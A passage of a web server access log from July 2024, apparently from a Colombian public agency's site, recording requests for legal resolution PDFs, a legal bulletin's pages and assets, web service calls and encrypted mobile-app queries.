E419F8teJi/bVpdbAxUmxdM361wT6M/HZZZKA1Fm7RyDkHV&y=U2FsdGVkX1+j7fMVwQQgT3dN924G24yK8msyvXKmq/3iqJK683Jnewj5pgRz1ETV HTTP/1.1" 200 60
186.102.59.197 - - [04/Jul/2024:10:37:48 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18Mc5eqT4sIolV8xAFKTRmbAwBG1PyddwjviVq5rxKfI7g41h9yRlEFVIXfmIwjkiZXC2/huP6h8ELPZnc3mHG60x13DZ+EQo76Y1zuWE1P5VM7CuZkEJcg1aE3x+W8gESJNTdiR9VnFbrJWwRTWGsYB5TBIk7kCeGzItMtgXn7gOBJkE8ZL7PIuFFWhcvMzdCkfBmFys/1UT+N7ThNOP27bCvr2FTkRCE68uruLeXonrC9cyRJPzf+&u=U2FsdGVkX1+iE7gVRE419F8teJi/bVpdbAxUmxdM361wT6M/HZZZKA1Fm7RyDkHV&y=U2FsdGVkX1+j7fMVwQQgT3dN924G24yK8msyvXKmq/3iqJK683Jnewj5pgRz1ETV HTTP/1.1" 200 25
186.102.59.197 - - [04/Jul/2024:10:37:48 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/uymUT75K7zCLy0TyJY7fVtlATfHSfljuqb/RcFd0UFXx7cyBZzA+zcLBTWXf/WMsDd9LPIJDSNJKOoo+WHkZ3IMdPTHT8QYURCu4NamhVRL1G/MY7K7BzuuA9/GbQakLQdPOR/2goXW3JaO80sUBqfn4dNwPv5EJtkLEhY2v0o3gfD5ueyMBk&u=U2FsdGVkX1+iE7gVRE419F8teJi/bVpdbAxUmxdM361wT6M/HZZZKA1Fm7RyDkHV&y=U2FsdGVkX1+j7fMVwQQgT3dN924G24yK8msyvXKmq/3iqJK683Jnewj5pgRz1ETV HTTP/1.1" 200 26
186.102.59.197 - - [04/Jul/2024:10:37:48 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19dFkiaWYGi1UqoPpRdK4YyCzNWvLFoWq0R0kMRieWOwm01uI4x8dl1/XiOJ4fTlFv4nPVrA75ZTLtdTBt6GlX826LrFRCoJHNjTz8LNYrzJ0hG+cG1zqzzO7f1f6PSZGfCSCfUoQXkyFIVeiM8mS23UrWXTv9rE1w=&u=U2FsdGVkX1+iE7gVRE419F8teJi/bVpdbAxUmxdM361wT6M/HZZZKA1Fm7RyDkHV&y=U2FsdGVkX1+j7fMVwQQgT3dN924G24yK8msyvXKmq/3iqJK683Jnewj5pgRz1ETV HTTP/1.1" 200 26
186.102.59.197 - - [04/Jul/2024:10:37:49 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/+eCuAyqRA9oQ+FNrOBVHm5Mi2+25hYt0J9qEDesa4vJZt+jRsOC0jx0RbW+stIKlCvpy2eVULRGXqICpA2QsOKVIfKiSv94S0Fm1S+x23/XTv30cj1yYFKSRSdSthU2LLzPBbMsXaarEjAAM97PM0deOTBOatrK4BrVWSIq+6wJgPilQWA/U2cVQQJ+pvqYoLxDSy+SiopU5XZEyo0WdFVDEomLZ/4z0I+emmqT4msdR2dZD8EcLE&u=U2FsdGVkX1+iE7gVRE419F8teJi/bVpdbAxUmxdM361wT6M/HZZZKA1Fm7RyDkHV&y=U2FsdGVkX1+j7fMVwQQgT3dN924G24yK8msyvXKmq/3iqJK683Jnewj5pgRz1ETV HTTP/1.1" 200 25
186.102.59.197 - - [04/Jul/2024:10:37:49 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18tOH/sBsFtXAkBLKuNA+IghK5P7rWmxFhsTHu7apVUMm1fXe7uvnYDZgYX/TbxfNVTElmvEaXshNvaXrpLS5uyUjXF6KF68Kvt4HpNmhndR9W5zjTkGu06H0UftADd4E45qtq+rwBSbe8vp149uOScoXiRtWfH5vcsYojJScHJ3U0bK7faJzCLHlD28w/653F0nXOsaSC+xQ==&u=U2FsdGVkX1+iE7gVRE419F8teJi/bVpdbAxUmxdM361wT6M/HZZZKA1Fm7RyDkHV&y=U2FsdGVkX1+j7fMVwQQgT3dN924G24yK8msyvXKmq/3iqJK683Jnewj5pgRz1ETV HTTP/1.1" 200 25
186.102.59.197 - - [04/Jul/2024:10:37:49 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18BrR+edN3udQri+uV6BfQcNnJZdmfA8dd0R17fwSfchDu3qd33Z5LGJgC0NiV6VSo1sdwUHKi1OwFCdFAlX0H2F83Fn3AyaIIOViiW3l3jWJ0cMIDyxhk6xIFDdgxksmoyI0lMrYkZhk1Bd9Pwxc3wecNnHeHraRF5oW2R6bkRkT/dYgrnm2Us7yCNmQzDs07vm5bsMAjVKQ==&u=U2FsdGVkX1+iE7gVRE419F8teJi/bVpdbAxUmxdM361wT6M/HZZZKA1Fm7RyDkHV&y=U2FsdGVkX1+j7fMVwQQgT3dN924G24yK8msyvXKmq/3iqJK683Jnewj5pgRz1ETV HTTP/1.1" 200 25
186.102.59.197 - - [04/Jul/2024:10:37:49 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19vdNJx2lf9kW7wlut+tkmaja4mFcj9EBXtdfgc+Z9PtiAiz5vAlctt9DlGvGCFIzEjBu1rsS3xvOAY8my3jTIUMx4Vdqwb9T5OqWVY7prr7Hb92ACjwcLu4XDU47Z9OLuKHe2v+nwdCUPhWVNh01SHpXne5K1WjMqyJ7MKxOnWaScu96TzjSkVCbB+B1Wv2NQUoM6UGcZbxNoT6MQEaAUngyGnT6VMtNlIIIeZqas+h+jVFQo7qLxPiDUg6YmeId+Uk4SthV1S7ZesDweMzcaukpw3Y2HmA7ahPDGlLyYmaqAcufgly4UoObpWWseI+q51KqR9CKHrcr3qoPYikYAOy6QfEd2+XrODkqfJKCf222DAQIMSSEdV&u=U2FsdGVkX1+iE7gVRE419F8teJi/bVpdbAxUmxdM361wT6M/HZZZKA1Fm7RyDkHV&y=U2FsdGVkX1+j7fMVwQQgT3dN924G24yK8msyvXKmq/3iqJK683Jnewj5pgRz1ETV HTTP/1.1" 200 25
186.102.59.197 - - [04/Jul/2024:10:37:49 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+AGMu7iiqr7ho0buBGVhGNPDpWn+6KG7nNencDO4Ed5bXoTXHapD6CPBb5vGcoknl/+TE0L7nsc30RC9Co3dz9qxOhM8LPqtpPLHJe2X4SyoHKKfUQ21XGSui1ZB0Q8V6GONA3ZuYTM1yVKUuo4AH3lWPvlW/D19VX/euFORul1oo3YTqQpYmamOz1bsGcdBVaZInmPlNrPg==&u=U2FsdGVkX1+iE7gVRE419F8teJi/bVpdbAxUmxdM361wT6M/HZZZKA1Fm7RyDkHV&y=U2FsdGVkX1+j7fMVwQQgT3dN924G24yK8msyvXKmq/3iqJK683Jnewj5pgRz1ETV HTTP/1.1" 200 26
186.102.59.197 - - [04/Jul/2024:10:37:49 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+0NeML1JfEmCkcUuTRAQaup91kwoOCC9V4SiOh4HtmBmvnviagG3WDDl9vpYE4EzzW6jHj3Doy0Bs6rMt0BnIG9WgKob0JvpqIdLUxb1EztfHPOGGCfKw6pE12A7qWZkrqaw3MWuMRBkVWn8Z4Dd4+rmAzDkSVvU9/3IRyt23FElV7pSrBGcDuGV7BJM/J5JIMCpD7ao06rpIUpkTuwJ2c1ZUDjU0U9EjXMQdb9PkfcXEN9Fy9+ops7xTKSpoVxuoX9qmqsakDjxg8EHjez0xBuwzhFMXSEtgKymjPfZs/BwTuBmNWbOIBdqUZqQ9RtADLfktdg62IezPDzxY3VYQplrPnET+sig8=&u=U2FsdGVkX1+iE7gVRE419F8teJi/bVpdbAxUmxdM361wT6M/HZZZKA1Fm7RyDkHV&y=U2FsdGVkX1+j7fMVwQQgT3dN924G24yK8msyvXKmq/3iqJK683Jnewj5pgRz1ETV HTTP/1.1" 200 26
186.102.59.197 - - [04/Jul/2024:10:37:49 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18kRgJj/4Pl15QbDgLDWT/gsG8FwkSaBaunDkIs5Z+K2QSsD3McHITwvT4LvEbWkK8wveeYgscPEeGLp1h95CzX2f4j6tV7oYv1yUkdPtkmR+Qt3bfE0liI0VRDiT/4cG6O4XMEHAGTVyZOugA/KXk8uf5uRv9x6fe+HsvkCuf82TUf304u0epxG7eof347SLsnZCRXvQ0TeRH5UqXrP4zE8UlXfzNjct4=&u=U2FsdGVkX1+iE7gVRE419F8teJi/bVpdbAxUmxdM361wT6M/HZZZKA1Fm7RyDkHV&y=U2FsdGVkX1+j7fMVwQQgT3dN924G24yK8msyvXKmq/3iqJK683Jnewj5pgRz1ETV HTTP/1.1" 200 25
186.102.59.197 - - [04/Jul/2024:10:37:49 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/CYHZgYck3UHhgQ2PUTIfTs4Asr9TAhASoUQCy8c8k6N1Lzp3FFZ2LqMYVU8oDMllsbqyVj9jBZ2TllrZZzxz0BhkSsMEafd7uPMRf4B0mf/Ysd1hSuJTeiTOjOusPGEhb4vO2vAnxffB2dltau90hneZvlo6cCd/MQnp6tlzuStrz54+qDXmJKb+/UGFsAkkGAuVKgx7BcA==&u=U2FsdGVkX1+iE7gVRE419F8teJi/bVpdbAxUmxdM361wT6M/HZZZKA1Fm7RyDkHV&y=U2FsdGVkX1+j7fMVwQQgT3dN924G24yK8msyvXKmq/3iqJK683Jnewj5pgRz1ETV HTTP/1.1" 200 26
186.102.59.197 - - [04/Jul/2024:10:37:50 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19hNNqGZmP/q0Zg1QDsSYNqmtDOwXx/TkjVFJOzkw6GiLRnIkTWUPaS6rByZ+wl8L+mKFzUMoknh5qYFJqFiVkPSLaNeecrb35Nn2SCpx7e50EYJ+ty6GJ2KOhgrnW60ewjiPrC0DNst3bZo2z4JE8hTzFOz3Rjpecsen4RM3/wn2bt0WdQxrPBd4zVT2peyCrtyieRGu/glEyU32p4hAZpBTRsZV5WZsY=&u=U2FsdGVkX1+iE7gVRE419F8teJi/bVpdbAxUmxdM361wT6M/HZZZKA1Fm7RyDkHV&y=U2FsdGVkX1+j7fMVwQQgT3dN924G24yK8msyvXKmq/3iqJK683Jnewj5pgRz1ETV HTTP/1.1" 200 25
186.102.59.197 - - [04/Jul/2024:10:37:50 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+uvX3xUPhJOf90LC0Ge21vOwzTDlzLRGPgSbIZNo1ul0c0tOQBW+afLw66tRx734VLVfB650lIxQ5kPWec96QIl1m0bxvDMydiMznpKWVNeDKqlusufgWLNRM7+sae/ZwGFg2iuzfWdN6r47s3EM5a0jRpVT/JFzDTSniRa0q1J7IlvyuhjnOS4z4bkqKp8tia+3VHYW8Tgg==&u=U2FsdGVkX1+iE7gVRE419F8teJi/bVpdbAxUmxdM361wT6M/HZZZKA1Fm7RyDkHV&y=U2FsdGVkX1+j7fMVwQQgT3dN924G24yK8msyvXKmq/3iqJK683Jnewj5pgRz1ETV HTTP/1.1" 200 26
216.244.66.195 - - [04/Jul/2024:10:38:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2486.pdf HTTP/1.1" 200 305158
201.245.192.253 - - [04/Jul/2024:10:38:13 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [04/Jul/2024:10:38:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [04/Jul/2024:10:38:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [04/Jul/2024:10:38:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2559.pdf HTTP/1.1" 200 2831419
172.22.2.4 - - [04/Jul/2024:10:37:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57291
172.22.2.4 - - [04/Jul/2024:10:39:02 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=168&usuario=&sector=PEV&fecha=2021&resuelve= HTTP/1.1" 200 1127
201.245.192.253 - - [04/Jul/2024:10:39:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 28422
201.245.192.253 - - [04/Jul/2024:10:39:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0168.pdf HTTP/1.1" 200 878046
201.245.192.253 - - [04/Jul/2024:10:39:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0168.pdf HTTP/1.1" 200 878046
201.245.192.253 - - [04/Jul/2024:10:39:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0168.pdf HTTP/1.1" 206 1025
66.249.73.38 - - [04/Jul/2024:10:39:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%202351-2401/00002397.tif HTTP/1.1" 200 140730
201.245.192.253 - - [04/Jul/2024:10:39:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:10:39:33 -0500] "GET /BLA/boletinlegal/norma_menu.php HTTP/1.1" 200 6382
216.244.66.195 - - [04/Jul/2024:10:39:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2775.pdf HTTP/1.1" 200 315830
201.245.192.253 - - [04/Jul/2024:10:39:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34321
172.22.2.4 - - [04/Jul/2024:10:39:52 -0500] "GET /BLA/boletinlegal/js/ajax.js HTTP/1.1" 200 772
172.22.2.4 - - [04/Jul/2024:10:39:52 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [04/Jul/2024:10:39:53 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [04/Jul/2024:10:39:53 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
172.22.2.4 - - [04/Jul/2024:10:39:53 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [04/Jul/2024:10:39:53 -0500] "GET /BLA/boletinlegal/swfobject.js HTTP/1.1" 200 9763
69.63.184.8 - - [04/Jul/2024:10:39:59 -0500] "GET /images/01052024%20Nota%20apertura%20senderos%20Cerros.jpeg HTTP/1.1" 200 130671
172.22.2.4 - - [04/Jul/2024:10:40:03 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=5071&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 1083
216.244.66.195 - - [04/Jul/2024:10:40:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2901.pdf HTTP/1.1" 200 285920
201.245.192.253 - - [04/Jul/2024:10:40:13 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [04/Jul/2024:10:40:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:10:40:33 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [04/Jul/2024:10:40:33 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [04/Jul/2024:10:40:33 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [04/Jul/2024:10:40:33 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [04/Jul/2024:10:40:33 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [04/Jul/2024:10:40:33 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [04/Jul/2024:10:40:33 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [04/Jul/2024:10:40:33 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [04/Jul/2024:10:40:33 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [04/Jul/2024:10:40:33 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [04/Jul/2024:10:40:33 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [04/Jul/2024:10:40:33 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [04/Jul/2024:10:40:34 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [04/Jul/2024:10:40:34 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [04/Jul/2024:10:40:34 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [04/Jul/2024:10:40:34 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [04/Jul/2024:10:40:34 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [04/Jul/2024:10:40:34 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [04/Jul/2024:10:40:34 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [04/Jul/2024:10:40:34 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1308
216.244.66.195 - - [04/Jul/2024:10:40:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3249.pdf HTTP/1.1" 200 304478
172.22.2.4 - - [04/Jul/2024:10:40:42 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
172.22.2.4 - - [04/Jul/2024:10:40:42 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
172.22.2.4 - - [04/Jul/2024:10:40:42 -0500] "GET /BLA/boletinlegal/images/arr_r.jpg HTTP/1.1" 200 1998
172.22.2.4 - - [04/Jul/2024:10:40:42 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
172.22.2.4 - - [04/Jul/2024:10:40:42 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [04/Jul/2024:10:40:43 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
172.22.2.4 - - [04/Jul/2024:10:40:43 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [04/Jul/2024:10:40:43 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [04/Jul/2024:10:40:43 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [04/Jul/2024:10:40:43 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [04/Jul/2024:10:40:43 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [04/Jul/2024:10:40:43 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
